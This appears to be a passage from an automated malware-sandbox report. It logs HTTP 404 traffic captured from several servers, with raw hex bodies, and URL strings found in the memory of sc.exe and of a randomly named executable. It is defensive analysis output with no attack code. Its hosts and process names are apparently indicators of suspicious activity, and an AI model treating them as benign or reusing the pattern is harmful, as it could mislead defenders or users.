61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 29 Mar 2024 13:24:50 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 29 Mar 2024 13:24:53 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 29 Mar 2024 13:26:29 GMTConnection: closeContent-Length: 103Data Raw: 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 29 Mar 2024 13:26:32 GMTConnection: closeContent-Length: 103Data Raw: 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 29 Mar 2024 13:26:35 GMTConnection: closeContent-Length: 103Data Raw: 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 29 Mar 2024 13:26:37 GMTConnection: closeContent-Length: 103Data Raw: 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 29 Mar 2024 13:26:25 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8f 41 4b c3 40 10 85 ef f9 15 63 ef 66 62 e9 c1 c3 b0 a0 4d 8a 85 d8 06 dd 1e 3c ae ee 48 0a 35 9b ce 4e 1a fc f7 dd a4 08 5e 06 de cc 7b 1f 6f e8 ae dc af ed 47 53 c1 8b 7d ad a1 39 3c d7 db 35 2c ee 11 b7 95 dd 20 96 b6 bc 5d 96 79 81 58 ed 16 26 a3 56 7f 4e 86 5a 76 3e 09 3d ea 89 cd aa 58 c1 2e 28 6c c2 d0 79 c2 db 32 23 9c 4d f4 19 fc ef 94 7b 30 ff 3c 49 65 d4 1b db 32 08 9f 07 8e ca 1e 0e 6f 35 8c 2e 42 97 58 df 13 0b 42 07 da 1e 23 44 96 0b 4b 4e d8 4f 24 49 c3 79 2f 1c a3 79 ea dd 57 82 bc cf 06 70 0a e3 38 e6 d2 4b 88 2a ae 8b 7a 09 b9 0c d0 04 51 78 2c 08 ff 62 a9 dd dc 2b 95 9c fe c9 ae 35 48 79 05 0a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ddMAK@cfbM<H5N^{oGS}9<5, ]yX&VNZv>=X.(ly2#M{0<Ie2o5.BXB#DKNO$Iy/yWp8K*zQx,b+5Hy0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 29 Mar 2024 13:26:28 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8f 41 4b c3 40 10 85 ef f9 15 63 ef 66 62 e9 c1 c3 b0 a0 4d 8a 85 d8 06 dd 1e 3c ae ee 48 0a 35 9b ce 4e 1a fc f7 dd a4 08 5e 06 de cc 7b 1f 6f e8 ae dc af ed 47 53 c1 8b 7d ad a1 39 3c d7 db 35 2c ee 11 b7 95 dd 20 96 b6 bc 5d 96 79 81 58 ed 16 26 a3 56 7f 4e 86 5a 76 3e 09 3d ea 89 cd aa 58 c1 2e 28 6c c2 d0 79 c2 db 32 23 9c 4d f4 19 fc ef 94 7b 30 ff 3c 49 65 d4 1b db 32 08 9f 07 8e ca 1e 0e 6f 35 8c 2e 42 97 58 df 13 0b 42 07 da 1e 23 44 96 0b 4b 4e d8 4f 24 49 c3 79 2f 1c a3 79 ea dd 57 82 bc cf 06 70 0a e3 38 e6 d2 4b 88 2a ae 8b 7a 09 b9 0c d0 04 51 78 2c 08 ff 62 a9 dd dc 2b 95 9c fe c9 ae 35 48 79 05 0a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ddMAK@cfbM<H5N^{oGS}9<5, ]yX&VNZv>=X.(ly2#M{0<Ie2o5.BXB#DKNO$Iy/yWp8K*zQx,b+5Hy0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 29 Mar 2024 13:26:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8f 41 4b c3 40 10 85 ef f9 15 63 ef 66 62 e9 c1 c3 b0 a0 4d 8a 85 d8 06 dd 1e 3c ae ee 48 0a 35 9b ce 4e 1a fc f7 dd a4 08 5e 06 de cc 7b 1f 6f e8 ae dc af ed 47 53 c1 8b 7d ad a1 39 3c d7 db 35 2c ee 11 b7 95 dd 20 96 b6 bc 5d 96 79 81 58 ed 16 26 a3 56 7f 4e 86 5a 76 3e 09 3d ea 89 cd aa 58 c1 2e 28 6c c2 d0 79 c2 db 32 23 9c 4d f4 19 fc ef 94 7b 30 ff 3c 49 65 d4 1b db 32 08 9f 07 8e ca 1e 0e 6f 35 8c 2e 42 97 58 df 13 0b 42 07 da 1e 23 44 96 0b 4b 4e d8 4f 24 49 c3 79 2f 1c a3 79 ea dd 57 82 bc cf 06 70 0a e3 38 e6 d2 4b 88 2a ae 8b 7a 09 b9 0c d0 04 51 78 2c 08 ff 62 a9 dd dc 2b 95 9c fe c9 ae 35 48 79 05 0a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ddMAK@cfbM<H5N^{oGS}9<5, ]yX&VNZv>=X.(ly2#M{0<Ie2o5.BXB#DKNO$Iy/yWp8K*zQx,b+5Hy0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 29 Mar 2024 13:26:34 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 266Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 70 72 6f 73 74 72 61 6e 73 74 76 6f 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rprostranstvo.ru Port 80</address></body></html>
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: sc.exe, 0000000E.00000002.4523397832.0000000004A22000.00000004.10000000.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4521232385.0000000003592000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
